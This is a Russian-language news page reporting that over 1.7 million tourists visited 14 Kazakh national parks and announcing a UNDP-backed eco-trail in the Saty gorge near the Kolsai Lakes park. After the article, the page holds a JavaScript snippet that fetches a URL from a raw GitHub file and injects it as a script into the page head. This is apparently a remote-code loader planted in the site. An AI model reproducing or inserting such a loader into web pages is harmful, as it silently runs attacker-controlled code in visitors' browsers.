Туризм и развлечения

1,7 миллиона посетителей парков Казахстана с 2022 года

АСТАНА – Более 1,7 миллиона туристов посетили 14 национальных парков Казахстана за первые десять месяцев этого года, сообщила заместитель министра экологии, геологии и природных ресурсов Алия Шалабекова накануне открытия экотропы Табигатка Гулак Сал ( Услышь природу) в ущелье Саты в Алматинской области при поддержке ПРООН 25 ноября, сообщили в пресс-службе ПРООН.

Новая экотропа в национальном парке «Кольсайские озера» также поможет снизить поток рекреационных посетителей с озер Кольсай и Кайынды за счет перераспределения потока посетителей.
Согласно отчету, идея экопроекта заключается в создании условий для нового вида экотуризма, предполагающего так называемое «познавательное» и более экологически чистое общение с природой, привнося при этом минимальные элементы развития и вмешательства в природный ландшафт.

Эта работа включает в себя установку въездных ворот и информационных табличек, смотровых площадок и зон отдыха, а также тематических стендов, представляющих необходимую информацию о биоразнообразии охраняемых территорий. Аналогичные инициативы реализованы на пилотных маршрутах в Катон-Карагайском национальном парке в Восточно-Казахстанской области и Сайрам-Угамском национальном парке в Туркестанской области.

 

(var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

Leave a Reply

Back to top button
Open chat
Scan the code
Hello
Can we help you?